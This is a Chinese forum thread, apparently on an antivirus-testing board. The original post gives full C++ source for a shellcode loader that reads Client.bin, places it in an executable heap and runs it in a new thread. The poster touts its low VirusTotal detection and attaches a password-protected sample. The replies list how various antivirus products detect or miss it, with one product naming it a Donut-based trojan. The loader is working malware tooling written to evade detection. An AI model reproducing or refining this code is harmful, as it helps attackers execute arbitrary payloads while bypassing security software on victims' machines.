自制shellcode分离加载器 (VT 1/70)

0殺神在心0

杀软搞啥呢 就几行代码而已
不至于1/70吧
#include <Windows.h>
#include <fstream>
#include <iostream>
#include <string.h>

void main()
{
        int Flag = 0;
        switch (Flag)
        {
        case(0):
        if (Flag == 0) {
                std::string filePath = ".\\Client.bin";
                std::ifstream infile(filePath, std::ifstream::binary);
                int size;
                infile.seekg(0, std::ios::end);
                size = infile.tellg();
                infile.seekg(0, std::ios::beg);
                char* data = new char[size];
                infile.read(static_cast<char*>(data), size);
                infile.close();
                typedef HANDLE(*HeapCreateFunc)(
                        DWORD  flOptions,
                        SIZE_T dwInitialSize,
                        SIZE_T dwMaximumSize
                        );
                HMODULE hKernel32 = LoadLibrary((LPCSTR)"Kernel32.dll");
                HeapCreateFunc pHeapCreate = (HeapCreateFunc)GetProcAddress(hKernel32, (LPCSTR)"HeapCreate");
                HANDLE HeapHandle = pHeapCreate(HEAP_CREATE_ENABLE_EXECUTE, size, 0);
                char* buffer = (char*)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, size);
                memcpy(buffer, data, size);
                HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)buffer, NULL, 0, NULL);
            WaitForSingleObject(hThread, INFINITE);
        }
        default:
                break;
        }
}

VT扫结果
VirusTotal - File - ba8edb0c37a8c0f8c7a37a0ec2fd95748a8d39d1e1db258cf823bce25de845eb
编译环境:win11 VS2019 x64
样本附上 解压密码:infected
IP指向是127.0.0.1
如果想要知道效果,就看窗口消失了没有,没消失就是过了

谈谈MEMZ

DI MISS
推荐测试完成后对所用杀软进行上报处理

soaringmz

kis kill
事件: 检测到恶意对象
用户类型: 发起者
应用程序名称: explorer.exe
应用程序路径: C:\Windows
组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan.Win64.Donut.a
精确度: 启发式分析
威胁级别: 高
对象类型: 文件
对象名称: Client.bin
对象路径: C:\Users\\AppData\Local\Temp\7zE890F2EE2
对象的 MD5: 2B23FF5AC322BA01C7FA59BC3BD8F9E4
原因: 专家分析
数据库发布日期: 今天，2023/8/1 13:22:00

UNknownOoo

火绒
扫描&双击：寄


EMSI
双击：主防拦截


Microsoft Defender
扫描：机学 1X



AhnLab
双击：主防拦截




WV
双击：主防拦截



HMPA
双击：主防拦截

0殺神在心0

soaringmz 发表于 2023-8-1 23:09
kis kill
事件: 检测到恶意对象
用户类型: 发起者

把bin杀了还行（

aboringman

360：0

可能是第一次见ShellcodeLoader.exe，自动上报了，结果为暂未发现风险。



Client.bin：



die

IamAngry

FS轻松被过

Shake2333

McAfee扫描miss

soaringmz

0殺神在心0 发表于 2023-8-1 23:11
把bin杀了还行（

kis只杀bin不杀exe
EIS 扫描miss
双击kill

0殺神在心0

UNknownOoo 发表于 2023-8-1 23:09
火绒
扫描&双击：寄

对主防效果还是蛮满意的awa